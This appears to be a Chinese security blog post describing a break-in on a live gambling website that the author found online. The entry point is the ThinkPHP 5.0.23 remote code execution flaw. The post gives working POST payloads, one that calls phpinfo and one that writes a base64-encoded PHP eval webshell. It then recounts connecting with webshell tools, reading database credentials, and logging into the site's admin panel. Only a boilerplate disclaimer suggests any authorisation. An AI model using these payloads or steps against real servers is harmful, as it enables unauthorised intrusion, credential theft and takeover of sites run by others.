站在大神宽阔的肩膀上复现菠菜漏洞

乌鸦安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限，如转载或传播此文章，需保证文章的完整性，未经授权，不得用于其他。

更新时间：2021.05.14

01 前提

在早些时候看到先知上有一篇关于thinkphp rce的菠菜文章

于是顺着师傅的思路也来试试

从网上顺利找到的某一个相似的站点，然后就按照师傅的思路来了

02 geshell之路

通过报错的方式发现了当前的版本为

ThinkPHPV5.0.23

通过师傅的思路，先去找phpinfo界面

http://127.0.0.1/index.php?s=captcha

POST数据：

_method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]=phpinfo()

成功拿到phpinfo界面

查看下这里禁用了贼多的命令

那尝试写一下一句话木马吧，按照师傅写的参考里面使用了很多次都没有效果，此时一度陷入僵局。

后来经过不断的fuzz发现，这里获取phpinfo界面的方式还有post的，后端可以同时接收get和post的数据。

知道这个之后，按照师傅文章的提示进行如下的数据构造：

_method=__construct&filter[]=assert&method=post&server[REQUEST_METHOD]=file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7))

将一句话木马进行加密

命令执行成功，get到shell

03 进后台

在路径：

/www/wwwroot/xxxxx/application/

发现数据库配置文件

蚁剑连接数据库失败：

使用哥斯拉连接数据库成功

查询到后台的账号和密码，在后台中翻到了后台地址（啊，这还不如直接猜。。。。）

登陆后台成功

04 总结

这次主要是踩在师傅宽大的肩膀上成功getshell的，但是还没能进行提权，命令直接被禁用，等下次有时间的时候再搞吧，溜了溜了

赌博害人害己，真的！！！